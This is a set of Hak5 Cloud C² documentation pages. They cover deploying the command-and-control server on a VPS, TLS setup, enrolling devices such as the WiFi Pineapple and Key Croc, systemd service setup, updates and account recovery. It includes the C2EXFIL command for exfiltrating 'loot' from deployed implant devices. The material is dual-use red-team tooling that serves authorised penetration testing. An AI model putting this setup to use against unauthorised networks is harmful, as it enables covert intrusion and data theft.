`wget https://downloads.hak5.org/api/devices/cloudc2/firmwares/latest -q -O c2.zip && unzip -qq c2.zip && \ IP=$(curl -s https://checkip.amazonaws.com) && \ echo "Copy the below setup token and browse to http://$IP:8080" && \ ./c2-*_amd64_linux -hostname $IP`
Obviously it assumes you’re running a 64-bit Linux server, and it’s hitting Amazon to figure out the external IP address. Adjust as necessary. Requires unzip to be installed, so apt install unzip if it isn’t.
AMAZON LIGHTSAIL QUICK SETUP [_link_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/#amazon-lightsail-quick-setup)
-------------------------------------------------------------------------------------------------------------------------------------------------------
Amazon Lightsail is an easy, inexpensive VPS – perfect for quick development work. Instances start at $3.50/month (at time of writing: Q2-2020). You will need to go through a few extra steps to add a free static IP address and firewall rules, but other than that it’s pretty straight forward.
Go to [https://lightsail.aws.amazon.com/ls/webapp/create/instance](https://lightsail.aws.amazon.com/ls/webapp/create/instance)
and follow the prompts.

We prefer Linux, OS Only, Ubuntu 18.04 LTS in this example.
info
At time of writing, Ubuntu 18.04 LTS was the latest long-term-support version of Ubuntu. We always recommend using the latest stable OS version.

We prefer the least expensive one and name it something memorable. Adjust as necessary.

Once your instance has been created, click into the **Networking** tab from the **Dashboard**

Click **Create** static IP

Attach the IP to your instance and click Create

Click into the instances dashboard and navigate to its **Networking** tab

Add TCP ports 443, 2022 and 8080 and click **Save**. The usual 22 and 80 should already be setup.

From the instances dashboard, navigate to the Connect tab and click the big Connect using SSH button.
If you’ve gone with the Ubuntu 18.04 LTS option, you’ll need to install unzip. For some reason it isn’t installed by default. From the terminal, run:
`sudo apt install unzip`
Finally, run the code snippet above and follow the on screen instructions.
CLOUD C² IS RUNNING. NOW WHAT? [_link_](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/#cloud-c-is-running-now-what)
--------------------------------------------------------------------------------------------------------------------------------------------------------
When you first navigate to the URL presented from the terminal, you’ll be prompted to provide your token (printed in the terminal), your license key (emailed to you) and setup an account.

Then you’ll be prompted to login.

From the dashboard, navigate to the devices tab.

From the devices tab, click Add Device

Give the device a name and select its device type, then click Add Device.

Click on the device name from the listing to open the device tab.

Click Setup, then Download to download the device provisioning file – `device.config`
See this article on [Adding Devices to Cloud C²](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
for more details.
* * *
[_navigate\_before_ Managing Devices](https://docs.hak5.org/cloud-c2/getting-started/managing-devices/)
[Lets Encrypt Ssl Configuration And Device Enrollment _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/)
---
# Lets Encrypt Ssl Configuration And Device Enrollment | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Lets Encrypt Ssl Configuration And Device Enrollment
====================================================
VIDEO GUIDE [_link_](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/#video-guide)
------------------------------------------------------------------------------------------------------------------------------
CONFIGURING SSL WITH A LET’S ENCRYPT TLS CERTIFICATE [_link_](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/#configuring-ssl-with-a-lets-encrypt-tls-certificate)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Generally
1. Add an A record for your domain to your VPS IP address
2. Add the `-https` parameter to the Cloud C² binary and set the -hostname flag to the fully qualified domain name.
For example:
`sudo ./c2-3.2.0_amd64_linux -hostname example.com -https`
warning
remember to specify the right architecture and version
info
From version 3.0.0 onward all, Cloud C² editions (Community, Edition, Teams) use the same binary. Filenames for Cloud C² will differ from example — however all parameters remain the same.
ADDING DEVICES [_link_](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/#adding-devices)
------------------------------------------------------------------------------------------------------------------------------------
Depending on which device you’re using, this file will go in a different place.
See this article on [Adding Devices to Cloud C²](https://docs.hak5.org/cloud-c2/getting-started/adding-devices/)
for more details - but generally:
* WiFi Pineapple – put `device.config` in `/etc/`
* LAN Turtle – put `device.config` in `/etc/`
* Packet Squirrel – put `device.config` in `/etc/`
* Signal Owl – put `device.config` in `/etc/` and use `C2CONNECT` in your payload
* Shark Jack – put `device.config` in `/etc/` and use `C2CONNECT` in your payload
* Screen Crab – put `device.config` on the root of the SD card
* Key Croc – put `device.config` on the root of the KeyCroc disk from arming mode
Generally, once the device is online it’ll connect back to Cloud C² and you’ll be able to interact with it from the dashboard. The exception to this is the Shark Jack and Signal Owl, which require the command `C2CONNECT` in the payload to initialize the connection.
Likewise, run the `C2DISCONNECT` command to cut the connection. This is by design so that you aren’t inadvertently connecting to your Cloud C² instance from every Shark Jack payload you run, as an example.
Many devices support the `C2NOTIFY` and `C2EXFIL` commands to send notifications and exfiltrate loot. The `C2EXFIL` command must be run for each file uploaded to the Cloud C² server.
When exfiltrating text files, you’ll want to add the `STRING` option in order to make it viewable from the dashboard. For example, `C2EXFIL STRING /root/loot/file.txt MyPayloadName`.
info
The payload name is optional, but helpful when multiple payloads run.
* * *
[_navigate\_before_ Quick Deployment On An Amazon Lightsail Vps](https://docs.hak5.org/cloud-c2/guides/quick-deployment-on-an-amazon-lightsail-vps/)
[Enabling Cloud C2 As A Service On Boot And Exfiltration _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/)
---
# Cloud C2 Setup With Self Signed Ssl Certificates | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Cloud C2 Setup With Self Signed Ssl Certificates
================================================
By default when using the `-https` flag with the Cloud C² binary, a Let’s Encrypt certificate will be used. In the case that you wish to provide a self-signed certificate, please note the following additional deployment details:
1) When generating the certificate, the Common Name must be the IP address or FQDN of the server. See this example:
`Our self-signed certificate was generated like this: (192.168.0.119 is the IP address of the machine running the Hak5 Cloud C2 server) openssl req -newkey rsa:2048 -x509 -sha256 -days 3650 -nodes -out cert.crt -keyout cert.key Country Name (2 letter code) [AU]:GB State or Province Name (full name) [Some-State]:Manchester Locality Name (eg, city) []:Manchester Organization Name (eg, company) [Internet Widgits Pty Ltd]:Hak5 Organizational Unit Name (eg, section) []:Developers Common Name (e.g. server FQDN or YOUR name) []:192.168.0.119 Email Address []:shop@hak5.org`
2) When provisioning the device, in addition to copying the `device.config` file to `/etc/`, the generated `cert.crt` must be appended to the `cert.pem` file in `/etc/ssl/`.
`1) SCP the resulting cert.crt to your devices, in "/etc/ssl/certs" 2) SSH into your device 3) Execute "cd /etc/ssl" 4) Execute "cat certs/cert.crt >> cert.pem" 5) Reboot the device The device should now successfully check-in to the Hak5 Cloud C2`
3) the command line arguments should be passed in the order `-hostname`, `-https`, `-keyFile` and `-certFile`
`./c2-3.2.0_amd64_linux -hostname 192.168.0.119 -https -keyFile /var/hak5c2/cert.key -certFile /var/hak5c2/cert.crt`
info
From version 3.0.0 onward all, Cloud C² editions (Community, Edition, Teams) use the same binary. Filenames for Cloud C² will differ from example — however all parameters remain the same.
* * *
[_navigate\_before_ Enabling Cloud C2 As A Service On Boot And Exfiltration](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/)
[Installing Updates To The Cloud C2 Server _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/installing-updates-to-the-cloud-c2-server/)
---
# Device Cannot Connect To Server | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Device Cannot Connect To Server
===============================
**I have provisioned my device with a device.config file per the device setup instructions, however it is not showing in Cloud** C²**. The device status indicates “Last seen: never”** [_link_](https://docs.hak5.org/cloud-c2/troubleshooting/device-cannot-connect-to-server/#i-have-provisioned-my-device-with-a-deviceconfig-file-per-the-device-setup-instructions-however-it-is-not-showing-in-cloud-cxb2-the-device-status-indicates)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The most common cause for this problem is a routing or firewall issue between the device and server. Here are some troubleshooting tips:
1. Verify that the `device.config` is indeed in `/etc/` on the device (or root of udisk/sd card for Key Croc/Screen Crab), and that it is the correct provisioning file for your server.
2. Start the Cloud C² client on the device, either by rebooting it (WiFi Pineapple, LAN Turtle, Packet Squirrel, Screen Crab, Key Croc) or issuing the `C2CONNECT` command in your payload (Shark Jack, Signal Owl).
3. Verify that the ports specified by your Cloud C² server (from the command line parameters) are open and accessible by the device’s network. The common defaults are TCP 80, 8080, 443, 2022.
4. Verify that the device can reach the server’s network. For example, if a WiFi Pineapple is deployed on an LAN with the IP address 192.168.1.100, and the Cloud C² server is deployed on the Internet at example.com, verify from a terminal on the WiFi Pineapple that it can reach example.com by issuing “`ping -c4 example.com`”
* * *
[_navigate\_before_ Upgrading Cloud C2 Editions](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/)
[Account Recovery _navigate\_next_](https://docs.hak5.org/cloud-c2/troubleshooting/account-recovery/)
---
# Enabling Cloud C2 As A Service On Boot And Exfiltration | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Enabling Cloud C2 As A Service On Boot And Exfiltration
=======================================================
VIDEO GUIDE [_link_](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/#video-guide)
---------------------------------------------------------------------------------------------------------------------------------
ENABLING CLOUD C2 AS A SERVICE ON BOOT WITH SYSTEMD [_link_](https://docs.hak5.org/cloud-c2/guides/enabling-cloud-c2-as-a-service-on-boot-and-exfiltration/#enabling-cloud-c2-as-a-service-on-boot-with-systemd)
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Note: From version 3.0.0 onward all, Cloud C² editions (Community, Edition, Teams) use the same binary. Filenames for Cloud C² will differ from example - however all parameters remain the same.
`# https://forums.hak5.org/topic/50283-u... # Expects Cloud C2 Community edition has run once before, generating c2.db # # Move Cloud C2 binary. sudo mv c2-3.2.0_amd64_linux /usr/local/bin # Create directory for database file sudo mkdir /var/cloudc2 # Move database file sudo mv c2.db /var/cloudc2/ # Create systemd service file. sudo vi /etc/systemd/system/cloudc2.service # Replace parameters as necessary for your instance [Unit] Description=Hak5 Cloud C2 After=cloudc2.service [Service] Type=idle ExecStart=/usr/local/bin/c2-3.2.0_amd64_linux -hostname example.com -https -db /var/cloudc2/c2.db [Install] WantedBy=multi-user.target # Reload, enable on boot, start and inspect the newly created Cloud C2 service sudo systemctl daemon-reload sudo systemctl enable cloudc2.service sudo systemctl start cloudc2.service sudo systemctl status cloudc2.service`
* * *
[_navigate\_before_ Lets Encrypt Ssl Configuration And Device Enrollment](https://docs.hak5.org/cloud-c2/guides/lets-encrypt-ssl-configuration-and-device-enrollment/)
[Cloud C2 Setup With Self Signed Ssl Certificates _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/cloud-c2-setup-with-self-signed-ssl-certificates/)
---
# Upgrading Cloud C2 Editions | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Upgrading Cloud C2 Editions
===========================
* * *
description: Upgrade your existing server license without re-installing [_link_](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/#description-upgrade-your-existing-server-license-without-re-installing)
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
From version **3.0.1 onward**, Cloud C² editions may be upgraded **in-place** without the need to redeploy the server.
Any edition may be upgraded, from Community to Professional, or Professional to Teams, or any combination therein. _Downgrades are not supported._
In the below **example**, we’ll upgrade our Teams Gold edition to Teams Platinum, enabling 10 additional users and sites.
Purchase License Upgrade from the [Hak5 Shop](https://shop.hak5.org/products/c2#upgrade)
[_link_](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/#purchase-license-upgrade-from-the-hak5-shop)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[**From the Shop C**² **Page**](https://shop.hak5.org/products/c2#upgrade)
: **Scroll down** and to the Upgrade Existing License button.

[https://shop.hak5.org/products/c2#upgrade](https://shop.hak5.org/products/c2#upgrade)
Select the **desired upgrade** from the drop-down menu (_in this example Teams Silver to Teams Platinum)_
Enter the **license key already in use by your C² Server** and click **Buy Upgrade**.
Continue to Checkout and complete the purchase as usual.
Upgrade your Server [_link_](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/#upgrade-your-server)
---------------------------------------------------------------------------------------------------------------------
**From your C² Server UI:** Click the Re-Activate button from the _Server Information_ section of the _Settings_ page.

Your C² Server UI > Settings > Server > Click Re-Activate
Once you have [**already purchased your desired upgrade from the shop**](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/#purchase-license-upgrade-from-the-hak5-shop)
, this will launch a dialog to reactivate your server.

Your C² Server UI **License Requries Reactivation** modal
Enter _**the license key that you purchased an upgrade for**_ and select the C² Edition you upgraded to then click Re-Activate
_If the C_² _title bar and loading bar appear at the top of the page and you aren’t automatically redirected back to your dashboard, simply refresh the page._
### Your Cloud C² edition has now been successfully upgraded! 🎉 [_link_](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/#your-cloud-c-edition-has-now-been-successfully-upgraded-tada)

Clicking Re-Activate again should yield License Valid
* * *
[_navigate\_before_ Installing Updates To The Cloud C2 Server](https://docs.hak5.org/cloud-c2/guides/installing-updates-to-the-cloud-c2-server/)
[Device Cannot Connect To Server _navigate\_next_](https://docs.hak5.org/cloud-c2/troubleshooting/device-cannot-connect-to-server/)
---
# Icon Sets | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Icon Sets
=========
Download these free icon sets for use with your Cloud C² installation.
ICON SET 1 [_link_](https://docs.hak5.org/cloud-c2/extras/icon-sets/#icon-set-1)
---------------------------------------------------------------------------------
[cloudc2-icon-set.zip](https://docs.hak5.org/cloud-c2/images/cloudc2-icon-set.zip)

ICON SET 2 [_link_](https://docs.hak5.org/cloud-c2/extras/icon-sets/#icon-set-2)
---------------------------------------------------------------------------------
[cloudc2-icon-set2.zip](https://docs.hak5.org/cloud-c2/images/cloudc2-icon-set2.zip)

ICON SET 3 [_link_](https://docs.hak5.org/cloud-c2/extras/icon-sets/#icon-set-3)
---------------------------------------------------------------------------------
[cloudc2-icon-set3.zip](https://docs.hak5.org/cloud-c2/images/cloudc2-icon-set3.zip)

* * *
[_navigate\_before_ Account Recovery](https://docs.hak5.org/cloud-c2/troubleshooting/account-recovery/)
---
# Installing Updates To The Cloud C2 Server | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Installing Updates To The Cloud C2 Server
=========================================
From time to time new versions of Cloud C² are released, and when published your server will check for over-the-air updates at login or server start. When available, these updates may be installed quickly and easily. For Linux and MacOS deployments, upgrades are automatic.
info
For Windows deployments, a new binary must be downloaded, replacing the existing.
You may notice at server start:
`[*] Initializing Hak5 Cloud C2 v3.0.1 [*] Hostname: example.com [*] DB Path: c2.db [*] Validating License [*] License Valid [*] Running Hak5 Cloud C2 [!] New C2 Server Update Available`
Or upon login:

To apply the update, click the Update button.
The console will report the following information:
`[!] Overseer update in progress, restarting [*] Shutting down gracefully [*] Server stopped [*] Initializing Hak5 Cloud C2 v3.0.2 [*] Hostname: example.com [*] DB Path: c2.db [*] Validating License [*] License Valid [*] Running Hak5 Cloud C2`
The web session will logout, and upon login you will be greeted with the new version.
* * *
[_navigate\_before_ Cloud C2 Setup With Self Signed Ssl Certificates](https://docs.hak5.org/cloud-c2/guides/cloud-c2-setup-with-self-signed-ssl-certificates/)
[Upgrading Cloud C2 Editions _navigate\_next_](https://docs.hak5.org/cloud-c2/guides/upgrading-cloud-c2-editions/)
---
# Account Recovery | Hak5 - Cloud C²
[](https://docs.hak5.org/cloud-c2/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Account Recovery
================
In the event that a user’s password is lost or forgotten, it may be reset using the `-recoverAccount` and `-setPass` command line parameters. In the following example, the password for the user “`bob`” is set to “`ChangeMe123!!`”
`./c2-3.2.0_amd64_linux -hostname example.com -recoverAccount bob -setPass ChangeMe123!! [*] Initializing Hak5 Cloud C2 v3.2.0 [*] Hostname: example.com [*] DB Path: c2.db -------------------------------------------------------------------------------- User Account Recovery Mode -------------------------------------------------------------------------------- [+] bob's password successfully changed [*] Account Recovery Complete [!] Server Restart without recovery arguments required [!] Exiting`
With account recovery complete, the server may now be started as usual without the additional recovery parameters.
* * *
[_navigate\_before_ Device Cannot Connect To Server](https://docs.hak5.org/cloud-c2/troubleshooting/device-cannot-connect-to-server/)
[Icon Sets _navigate\_next_](https://docs.hak5.org/cloud-c2/extras/icon-sets/)
---